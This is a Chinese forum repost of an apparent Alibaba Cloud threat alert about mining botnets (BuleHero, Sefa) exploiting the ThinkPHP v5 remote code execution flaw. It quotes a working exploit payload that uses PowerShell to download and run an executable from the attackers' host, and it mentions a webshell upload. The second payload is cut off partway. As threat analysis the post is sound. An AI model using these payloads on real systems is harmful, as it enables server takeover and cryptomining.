请选择 进入手机版 | 继续访问电脑版
 找回密码
 立即注册

QQ登录

只需要一步,快速开始

搜索
开启左侧

威胁预警|多个挖矿僵尸网络开始使用ThinkPHPv5漏洞威胁升级 ...

海苑 2019-7-17 12:55:41 显示全部楼层 阅读模式

马上注册,分享更多源码,享用更多功能,让你轻松玩转云大陆。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
前言
12月10日,ThinkPHP团队发布了版本更新,修复了一处远程命令执行漏洞,该漏洞是由于ThinkPHP框架对控制器没有进行严格的安全过滤,致使攻击者可以伪造恶意参数进行代码执行。12月11日,阿里云即发布威胁预警,表示捕获到首例利用漏洞的攻击案例,并提醒用户及时进行漏洞修复和攻击防范。
近日,阿里云安全专家发现已有挖矿僵尸网络开始利用ThinkPHP v5漏洞进行广泛传播威胁升级,并成功捕获到两个进行追踪分析。安全专家分析: 这两个僵尸网络都使用蠕虫形式进行大范围传播,其中BuleHero具备内网扩散的功能,暴露在互联网上的漏洞主机存在很大的被感染风险。一旦主机被感染,将会成为黑客的肉鸡进行挖矿和网络攻击,恶意行为占用主机CPU资源,会严重影响正常业务运行。另外,物联网僵尸网络Sefa也加入争夺漏洞主机的控制权中。
ThinkPHP v5漏洞严重且影响广泛,安全专家预计会有更多的僵尸网络使用此漏洞进行扩张,提醒用户加强关注,并建议按照文末解决方案进行防御。
详细分析如下:
1
BuleHero
BuleHero是一个利用多种安全漏洞入侵,并控制windows服务器挖矿牟取利益的僵尸网络。阿里云监控到,该僵尸网络从12月19日新增利用 ThinkPhp远程命令执行漏洞进行攻击传播。BuleHero使用蠕虫方式复制和传播,僵尸网络的攻击模块会对内网进行攻击,一旦感染该恶意软件,企业内网将会遭受损失。
漏洞利用:
利用漏洞下载恶意二进制文件并执行。该文件是僵尸网络下载器,会继续下载和释放多个可执行文件,包括挖矿软件挖掘门罗币和漏洞利用模块进行攻击和传播。
漏洞利用方式1:直接执行powershell
攻击payload: s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/15.exe');start C:/15.exe


漏洞利用方式2:利用漏洞上传文件名为hydra.php的webshell,该webshell可执行后门命令,接着利用webshell执行powershell代码
攻击payload1: s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

  • 0 关注
  • 0 粉丝
  • 2 帖子
广告招商